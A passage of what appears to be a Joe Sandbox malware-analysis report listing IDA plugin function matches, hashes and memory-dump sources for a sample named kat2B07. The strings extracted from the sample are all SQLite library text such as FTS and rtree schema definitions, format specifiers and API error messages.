                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,%.*s$Auxiliary rtree columns must be last$CREATE TABLE x(%.*s INT$_node
                                                                • API String ID: 0-209218429
                                                                • Opcode ID: 4580951cb685faf61d0366b8da0f47c5e70de13582a297ae2ebf0dfeb7197193
                                                                • Instruction ID: 6e094edfa7f634011ae4a6d194e1d543bc8af58f2e9b639755e0dc6d7c5f6e4e
                                                                • Opcode Fuzzy Hash: 4580951cb685faf61d0366b8da0f47c5e70de13582a297ae2ebf0dfeb7197193
                                                                • Instruction Fuzzy Hash: 5BF1FF74508301AFC7008F24D884B6BB7F4AF45359F4905A9FA4A9B222D736F959CBB3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %.16g$%.3f$%02d$%02d:%02d$%02d:%02d:%02d$%03d$%04d$%04d-%02d-%02d$%06.3f$%2d$%lld$u
                                                                • API String ID: 0-1613945299
                                                                • Opcode ID: b125deeefe5c1f93c8c28d1e87cf67a5f6ef6e671b57663cc886e7ffa3803deb
                                                                • Instruction ID: 6ebb84378a4cfca72a047a848d3687f22f224ef6333e0a18d6ebd6df89994f5d
                                                                • Opcode Fuzzy Hash: b125deeefe5c1f93c8c28d1e87cf67a5f6ef6e671b57663cc886e7ffa3803deb
                                                                • Instruction Fuzzy Hash: CFF136B190C301ABD301CB28DC44F6BB3EABF89324F458A1DF98497252EB35E9458753
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,%s$CREATE TABLE x(_shape$_node
                                                                • API String ID: 0-1242591684
                                                                • Opcode ID: 7cd980e2297c69705a5306e4e4fea89315a958c57c89219faf6ec0ff94f35b5c
                                                                • Instruction ID: 6a2b08f96e91e9be555ac583b257fe2ab3ede6c00072de2afc8528c07b8145e8
                                                                • Opcode Fuzzy Hash: 7cd980e2297c69705a5306e4e4fea89315a958c57c89219faf6ec0ff94f35b5c
                                                                • Instruction Fuzzy Hash: BEC12275508701ABC7009F28DCC8B2777B9FF41369F054229EA4A97262EB36F514CBA3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %.16g$%.18s-%s$%c%u$%lld$%s(%d)$(blob)$,%s%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                • API String ID: 0-900822179
                                                                • Opcode ID: 6984a8ba0e088b1c2e90321e96a86995ba9124e82653c8fdf32d74bb720b02d1
                                                                • Instruction ID: ecad45d1720d25f4a667e525c691c3b4e94b2e4f16f654c6c8ca95a1c1e6e2ac
                                                                • Opcode Fuzzy Hash: 6984a8ba0e088b1c2e90321e96a86995ba9124e82653c8fdf32d74bb720b02d1
                                                                • Instruction Fuzzy Hash: 3E91EF709083469BCB01CF54D894BAB77E5BFC5708F55899CF9888F263D722E90687A3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
                                                                • API String ID: 0-449611708
                                                                • Opcode ID: 8106a218278168f200e5b07eb32b578a6ef390dc1876e3bba7da8b51d16190d2
                                                                • Instruction ID: 99c9cd2fbb6179d205e95987a6d3f48b3f1276cc8346f2eaa2b97ecacdf5b7ab
                                                                • Opcode Fuzzy Hash: 8106a218278168f200e5b07eb32b578a6ef390dc1876e3bba7da8b51d16190d2
                                                                • Instruction Fuzzy Hash: A0513D70B09311B7D7115A6CECC4F7B36A86F41679F158139FE88A3243E768F91582A3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                • API String ID: 0-2933911573
                                                                • Opcode ID: 4c9b0b5cc83ebbf107288648116c99d7f667e2b34ebe68c3545486b518e2cc18
                                                                • Instruction ID: 354dcdd2c1fffeeb09780decf850a4a3c3e491d374b9324bf24ebd0ed8759d8f
                                                                • Opcode Fuzzy Hash: 4c9b0b5cc83ebbf107288648116c99d7f667e2b34ebe68c3545486b518e2cc18
                                                                • Instruction Fuzzy Hash: 4CA19E71554201DBD3005B28AC84BFA77A9DF42235F5541A6FD849B193E62FE10EC7B3
                                                                Strings
                                                                • unopened, xrefs: 1D752E55
                                                                • WHERE name=%Q, xrefs: 1D752DB7
                                                                • misuse, xrefs: 1D752E73
                                                                • API call with %s database connection pointer, xrefs: 1D752E5A
                                                                • NULL, xrefs: 1D752E38
                                                                • ORDER BY name, xrefs: 1D752DCC
                                                                • SELECT * FROM (SELECT 'sqlite_schema' AS name,1 AS rootpage,'table' AS type UNION ALL SELECT name,rootpage,type FROM "%w".sqlite_schema WHERE rootpage!=0), xrefs: 1D752DA4
                                                                • %s at line %d of [%.10s], xrefs: 1D752E78
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D752E69
                                                                • invalid, xrefs: 1D752E4E
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ORDER BY name$%s at line %d of [%.10s]$API call with %s database connection pointer$NULL$SELECT * FROM (SELECT 'sqlite_schema' AS name,1 AS rootpage,'table' AS type UNION ALL SELECT name,rootpage,type FROM "%w".sqlite_schema WHERE rootpage!=0)$WHERE name=%Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
                                                                • API String ID: 0-1179878930
                                                                • Opcode ID: 4ba12ae1f5d30ac0d122296aae9f39990118267a2d56b923821366afcdca2952
                                                                • Instruction ID: 3688a3176d407ee46d82f38786993d783ff0828e9ec14eb7cfa05efffaa2c64b
                                                                • Opcode Fuzzy Hash: 4ba12ae1f5d30ac0d122296aae9f39990118267a2d56b923821366afcdca2952
                                                                • Instruction Fuzzy Hash: 55C14374A08300DBD7018F24DCC8B6B37A0AF41375F05852AFC59AB293E735E94A87A3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: automerge$crisismerge$deletemerge$hashsize$pgsz$rank$secure-delete$usermerge
                                                                • API String ID: 0-3330941169
                                                                • Opcode ID: 3b23ab806eb27b20b06bdcd33342769f43f63fd7aaf40117cb92c9c5c38c84bb
                                                                • Instruction ID: f4f0cfac4307ea850bfc7d9a662fb23893a9f3609a3011af7ec2616ed29ba19a
                                                                • Opcode Fuzzy Hash: 3b23ab806eb27b20b06bdcd33342769f43f63fd7aaf40117cb92c9c5c38c84bb
                                                                • Instruction Fuzzy Hash: 77713ABAB042515BCB04DA59FC005AE77D5EFC1216F0504BEFA46D7222EB21F94AC7A3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id'$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such fts5 table: %s.%s$recursive definition for %s.%s
                                                                • API String ID: 0-1070437968
                                                                • Opcode ID: 2dd5220f366da4d6583203037b90b0a0896407eb6a570906e2cf17b00c82071b
                                                                • Instruction ID: 9b3265dec14d82ae79369d4250ea8cbb826971acc58315f6f69cb54f2baa6747
                                                                • Opcode Fuzzy Hash: 2dd5220f366da4d6583203037b90b0a0896407eb6a570906e2cf17b00c82071b
                                                                • Instruction Fuzzy Hash: 4402E2B4904741EBD712CF28DC84BAB77E4BF85328F21852EE94997212E731E504CBA3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such function: %s
                                                                • API String ID: 0-3900766660
                                                                • Opcode ID: aaed1b9c82ff46153de276f72b6df2cda26146d551a6439997e0e0f8a767ebd8
                                                                • Instruction ID: f871f0afaccc608d2e2a874800304cf28a4c0ae93029290db740c025d08e6d66
                                                                • Opcode Fuzzy Hash: aaed1b9c82ff46153de276f72b6df2cda26146d551a6439997e0e0f8a767ebd8
                                                                • Instruction Fuzzy Hash: E2E113B5A087019BD710CF29DC84B6B77E4BF84724F01452EE9A99B352E735E805CBA3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$cannot open value of type %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$integer$misuse$no such rowid: %lld$null$real
                                                                • API String ID: 0-1477268580
                                                                • Opcode ID: 89420906d4ad173b4a097cf00254c3f76b1873572c34b0a7361f09aa3165c8d6
                                                                • Instruction ID: e2cbbeef999ba9105efb9a265a61a9ec38ed6ad54521ca58df0150c5ff44531f
                                                                • Opcode Fuzzy Hash: 89420906d4ad173b4a097cf00254c3f76b1873572c34b0a7361f09aa3165c8d6
                                                                • Instruction Fuzzy Hash: BF51F5B46043019FDB109F68DC49A66B3A4FF84329F05496EE6658B752E731F404CBA3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %!.15g$%02x$%lld$'%.*q'$-- $NULL$NULL$zeroblob(%d)
                                                                • API String ID: 0-3665355275
                                                                • Opcode ID: 541f96621a07c1395c2884cdc7783cdea0275605445350161a5dda3185720221
                                                                • Instruction ID: 84f77dee6f7a17891561504fc4947bdb51bcc3eef615fe9d53c1a9c8220084c1
                                                                • Opcode Fuzzy Hash: 541f96621a07c1395c2884cdc7783cdea0275605445350161a5dda3185720221
                                                                • Instruction Fuzzy Hash: EED1CFB190C345ABC709CF64D986A6ABBE8AFC961CF044A1DF9C993212E331E544CB53
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s_data$data$id INTEGER PRIMARY KEY, block BLOB$idx$segid, term, pgno, PRIMARY KEY(segid, term)
                                                                • API String ID: 0-1009905541
                                                                • Opcode ID: 40cc2ce978b0adecc9a2a5d3b0ae7f5566b528c51b1f98684b3ae19ea943f7b3
                                                                • Instruction ID: a34830f0becc35cf70959b14e996c0466c9de0ba9946de4887c350729e753cd5
                                                                • Opcode Fuzzy Hash: 40cc2ce978b0adecc9a2a5d3b0ae7f5566b528c51b1f98684b3ae19ea943f7b3
                                                                • Instruction Fuzzy Hash: 1A716B75508310EBD7009B64DCC9B6BB7B8BF0269AF014668F906AB252DB35F514CFA3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: , c%d$config$content$docsize$id INTEGER PRIMARY KEY$id INTEGER PRIMARY KEY, sz BLOB$id INTEGER PRIMARY KEY, sz BLOB, origin INTEGER$k PRIMARY KEY, v$version
                                                                • API String ID: 0-3918257174
                                                                • Opcode ID: f87386d9e7f13b61cf994d6adf7820f8b144749925423c67f3541b4a564d7af4
                                                                • Instruction ID: 4d14389ed56ffb87c4007c470a4ecba4f19b164e099b7666537be705c9596b74
                                                                • Opcode Fuzzy Hash: f87386d9e7f13b61cf994d6adf7820f8b144749925423c67f3541b4a564d7af4
                                                                • Instruction Fuzzy Hash: 62512632908211EBC7109F24DC84B6B77A8EF857A5F054669FD499B202D739F909CBE3
                                                                Strings
                                                                Memory Dump Source
